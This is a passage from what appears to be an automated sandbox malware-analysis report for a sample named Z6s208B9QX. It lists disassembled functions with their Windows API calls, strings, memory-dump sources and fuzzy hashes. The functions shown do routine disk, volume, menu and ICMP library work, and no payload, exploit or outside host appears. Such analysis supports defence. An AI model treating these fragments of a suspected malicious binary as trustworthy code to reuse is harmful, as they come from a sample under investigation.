                                                                                                        • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                                        Function 004509D8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 97COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DestroyWindow
                                                                                                        • String ID: msctls_updown32
                                                                                                        • API String ID: 3375834691-2298589950
                                                                                                        • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                        • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                                        • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                                        • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                                        Function 0044DC13 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: $<
                                                                                                        • API String ID: 4104443479-428540627
                                                                                                        • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                        • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                                        • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                                        • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                                        Function 0045D779 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 1682464887-234962358
                                                                                                        • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                        • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                                        • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                                        • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                                        Function 0045D78F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 1682464887-234962358
                                                                                                        • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                        • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                                        • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                                        • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                                        Function 0045D86D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 1682464887-234962358
                                                                                                        • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                        • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                                        • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                                        • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                                        Function 0045D36D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 2507767853-234962358
                                                                                                        • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                        • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                                        • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                                        • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                                        Function 0045D53E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                                        • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                                        • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$InformationVolume
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 2507767853-234962358
                                                                                                        • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                        • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                                        • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                                        • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                                        Function 00450ACC Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                                        • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID: msctls_trackbar32
                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                        • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                        • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                                        • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                                        • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                                        Function 00435215 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                                        • String ID: crts
                                                                                                        • API String ID: 943502515-3724388283
                                                                                                        • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                                        • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                                        Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorMode$LabelVolume
                                                                                                        • String ID: \VH
                                                                                                        • API String ID: 2006950084-234962358
                                                                                                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                                                                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                                                                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                                                                        Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • GetMenuItemInfoW.USER32 ref: 00449727
                                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                                                                        • DrawMenuBar.USER32 ref: 00449761
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Menu$InfoItem$Draw_malloc
                                                                                                        • String ID: 0
                                                                                                        • API String ID: 772068139-4108050209
                                                                                                        • Opcode ID: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                        • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                                                                        • Opcode Fuzzy Hash: 1167fa92614d233b3003e6fb28f1152d6dc9f7ab2b98f531c98f2f78594b2958
                                                                                                        • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                                                                        Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$_wcscpy
                                                                                                        • String ID: 3, 3, 8, 1
                                                                                                        • API String ID: 3469035223-357260408
                                                                                                        • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                        • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                                                                        • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                                                                        • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                                                                        Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                                        • API String ID: 2574300362-3530519716
                                                                                                        • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                        • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                                        • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                                        • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                                        Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AddressLibraryLoadProc
